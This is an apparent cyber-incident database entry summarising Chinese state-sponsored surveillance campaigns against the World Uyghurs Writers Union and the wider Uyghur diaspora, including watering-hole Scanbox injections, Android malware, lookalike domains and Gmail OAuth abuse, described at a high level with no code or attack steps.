Cyber Incident Victim: World Uyghurs Writers Union
Date:
Sep 2015
Location:
China
Summary
Chinese state-sponsored actors conducted extensive cyber campaigns targeting Uyghur individuals and organizations through compromised websites and malicious infrastructure. Attackers deployed surveillance tools like the Scanbox framework to profile visitors and exploited Android devices with ARM-based malware, while leveraging fraudulent Google OAuth prompts to hijack Gmail accounts. The operations involved doppelganger domains mimicking legitimate platforms and utilized multiple intrusion sets to facilitate data theft, physical tracking, and persistent monitoring of the diaspora community.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 3 motives | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
Between 2013 and 2019, Chinese state-sponsored advanced persistent threat (APT) groups conducted extensive cyber surveillance and exploitation campaigns targeting the Uyghur diaspora and affiliated organizations. Attackers compromised at least 11 Uyghur and East Turkistan-related websites, injecting unauthorized JavaScript code to deploy the Scanbox framework. This framework profiled visitors' systems, extracted sensitive data like usernames and installed software, and facilitated the delivery of additional exploits. Simultaneously, attackers distributed malicious 64-bit ARM executables to Android mobile users through compromised platforms, enabling device surveillance.
The campaigns employed doppelganger domains mimicking Google, the Turkistan Times, and the Uyghur Academy to deceive targets into providing credentials. Attackers abused Google OAuth to gain unauthorized access to victims' Gmail accounts and contact lists, expanding their targeting capabilities. Volexity identified infrastructure overlaps suggesting possible links to iPhone-focused attacks against Uyghurs. At least two distinct Chinese APT groups coordinated these operations, leveraging compromised websites as strategic attack platforms. The campaigns enabled persistent monitoring of Uyghur activists' communications, movements, and organizational networks, intensifying digital repression alongside physical detention campaigns in Xinjiang. Volexity's analysis revealed attacker infrastructure, network signatures, and exploitation patterns but did not document specific mitigation actions by affected organizations.